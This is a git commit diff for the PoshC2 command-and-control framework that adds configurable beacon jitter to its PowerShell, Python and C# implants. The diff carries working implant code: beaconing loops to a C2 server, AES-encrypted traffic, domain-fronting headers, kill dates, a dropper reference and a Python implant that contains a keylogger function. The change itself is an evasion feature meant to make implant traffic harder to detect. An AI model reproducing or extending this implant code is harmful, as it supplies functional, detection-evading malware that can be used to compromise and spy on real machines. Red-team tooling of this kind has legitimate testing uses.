Add configurable jitter to all implants
m0rv4i
parent
76537b8d48
commit
2ecd16a4e4
|
|
@ -9,6 +9,7 @@ ROOTDIR = "/opt/PoshC2_Project/"
|
|||
HostnameIP = "https://192.168.233.1"
|
||||
DomainFrontHeader = "" # example df.azureedge.net
|
||||
DefaultSleep = "5s"
|
||||
Jitter = 0.20
|
||||
KillDate = "08/06/2019"
|
||||
UserAgent = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
|
||||
urlConfig = UrlConfig("%soldurls.txt" % POSHDIR) # Instantiate UrlConfig object - old urls using a list from a text file
|
||||
|
|
|
|||
|
|
@ -1,4 +1,5 @@
|
|||
$key="%s"
|
||||
$jitter=%s
|
||||
Function Beacon($sleeptime) {
|
||||
if ($sleeptime.ToLower().Contains('m')) {
|
||||
$sleeptime = $sleeptime -replace 'm', ''
|
||||
|
|
@ -119,17 +120,17 @@ function Encrypt-String($key, $unencryptedString) {
|
|||
[System.Convert]::ToBase64String($fullData)
|
||||
}
|
||||
function Encrypt-Bytes($key, $bytes) {
|
||||
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
|
||||
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
|
||||
$gzipStream.Write( $bytes, 0, $bytes.Length )
|
||||
$gzipStream.Close()
|
||||
$bytes = $output.ToArray()
|
||||
$output.Close()
|
||||
$aesManaged = Create-AesManagedObject $key
|
||||
$encryptor = $aesManaged.CreateEncryptor()
|
||||
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
|
||||
[byte[]] $fullData = $aesManaged.IV + $encryptedData
|
||||
$fullData
|
||||
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
|
||||
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
|
||||
$gzipStream.Write( $bytes, 0, $bytes.Length )
|
||||
$gzipStream.Close()
|
||||
$bytes = $output.ToArray()
|
||||
$output.Close()
|
||||
$aesManaged = Create-AesManagedObject $key
|
||||
$encryptor = $aesManaged.CreateEncryptor()
|
||||
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
|
||||
[byte[]] $fullData = $aesManaged.IV + $encryptedData
|
||||
$fullData
|
||||
}
|
||||
function Decrypt-String($key, $encryptedStringWithIV) {
|
||||
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
|
||||
|
|
@ -188,7 +189,7 @@ while($true)
|
|||
$date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
|
||||
$killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null)
|
||||
if ($killdate -lt $date) {exit}
|
||||
$sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
|
||||
$sleeptimeran = $sleeptime, ($sleeptime * (1 + $Jitter)), ($sleeptime * (1 - $Jitter))
|
||||
$newsleep = $sleeptimeran|get-random
|
||||
if ($newsleep -lt 1) {$newsleep = 5}
|
||||
start-sleep $newsleep
|
||||
|
|
|
|||
|
|
@ -15,6 +15,7 @@ urls = [%s]
|
|||
kd=time.strptime("%s","%%d/%%m/%%Y")
|
||||
useragent = ""
|
||||
imbase = "%s"
|
||||
jitter = %s
|
||||
|
||||
def keylog():
|
||||
# keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py
|
||||
|
|
@ -96,7 +97,8 @@ while(True):
|
|||
uri = "%s"
|
||||
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
|
||||
try:
|
||||
time.sleep(timer)
|
||||
this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter))
|
||||
time.sleep(this_timer)
|
||||
ua='%s'
|
||||
if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua})
|
||||
else: req=urllib2.Request(server,headers={'User-agent':ua})
|
||||
|
|
|
|||
|
|
@ -210,6 +210,10 @@ public class Program
|
|||
m = re.Match(x);
|
||||
var Sleep = m.Groups[1].ToString();
|
||||
|
||||
re = new Regex("JITTER2025(.*)5202RETTIJ");
|
||||
m = re.Match(x);
|
||||
var Jitter = m.Groups[1].ToString();
|
||||
|
||||
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
|
||||
m = re.Match(x);
|
||||
var NewKey = m.Groups[1].ToString();
|
||||
|
|
@ -218,7 +222,7 @@ public class Program
|
|||
m = re.Match(x);
|
||||
var IMGs = m.Groups[1].ToString();
|
||||
|
||||
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
|
||||
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs, Jitter);
|
||||
}
|
||||
}
|
||||
|
||||
|
|
@ -365,7 +369,7 @@ public class Program
|
|||
}
|
||||
}
|
||||
|
||||
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
|
||||
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
|
||||
{
|
||||
UrlGen.Init(stringURLS, RandomURI, baseURL);
|
||||
ImgGen.Init(stringIMGS);
|
||||
|
|
@ -381,7 +385,7 @@ public class Program
|
|||
Console.SetOut(strOutput);
|
||||
var exitvt = new ManualResetEvent(false);
|
||||
var output = new StringBuilder();
|
||||
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
|
||||
while (!exitvt.WaitOne((int)(new Random().Next((int)(beacontime * 1000 * (1F - Double.Parse(Jitter))), (int)(beacontime * 1000 * (1F + Double.Parse(Jitter)))))))
|
||||
{
|
||||
if (Convert.ToDateTime(KillDate) < DateTime.Now)
|
||||
{
|
||||
|
|
|
|||
12
Implant.py
12
Implant.py
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
from Colours import Colours
|
||||
from Utils import randomuri, gen_key
|
||||
from Config import PayloadsDirectory, FilesDirectory
|
||||
from Config import PayloadsDirectory, FilesDirectory, Jitter
|
||||
from DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns
|
||||
from Core import get_images
|
||||
|
||||
|
|
@ -28,6 +28,7 @@ class Implant(object):
|
|||
self.UserAgent = get_defaultuseragent()
|
||||
self.Sleep = get_defaultbeacon()
|
||||
self.ModsLoaded = ""
|
||||
self.Jitter = Jitter
|
||||
self.ImplantID = ""
|
||||
self.Pivot = pivot
|
||||
self.KillDate = get_killdate()
|
||||
|
|
@ -39,16 +40,17 @@ RANDOMURI19901%s10991IRUMODNAR
|
|||
URLS10484390243%s34209348401SLRU
|
||||
KILLDATE1665%s5661ETADLLIK
|
||||
SLEEP98001%s10089PEELS
|
||||
JITTER2025%s5202RETTIJ
|
||||
NEWKEY8839394%s4939388YEKWEN
|
||||
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
|
||||
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Jitter, self.Key, self.AllBeaconImages)
|
||||
with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f:
|
||||
self.PythonImplant = base64.b64encode(f.read())
|
||||
py_implant_core = open("%s/Implant-Core.py" % FilesDirectory, 'r').read()
|
||||
self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent)
|
||||
self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter, self.Key, self.RandomURI, self.UserAgent)
|
||||
ps_implant_core = open("%s/Implant-Core.ps1" % FilesDirectory, 'r').read()
|
||||
self.PSCore = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
|
||||
#Add all db elements
|
||||
self.PSCore = ps_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self):
|
||||
|
||||
#Add all db elements
|
||||
def display(self):
|
||||
print Colours.GREEN,""
|
||||
it = self.Pivot
|
||||
|
|
|
|||
|
|
@ -10,6 +10,7 @@ Add ability to upload a file to an ADS
|
|||
Update BloodHound
|
||||
Pull out unpatched payloads into file for easy management
|
||||
Add base64 encoded versions of the shellcode to the payloads directory
|
||||
Add a configurable jitter to all implants
|
||||
|
||||
4.8 (13/02/19)
|
||||
==============
|
||||
|
|
|
|||
Loading…
Reference in New Issue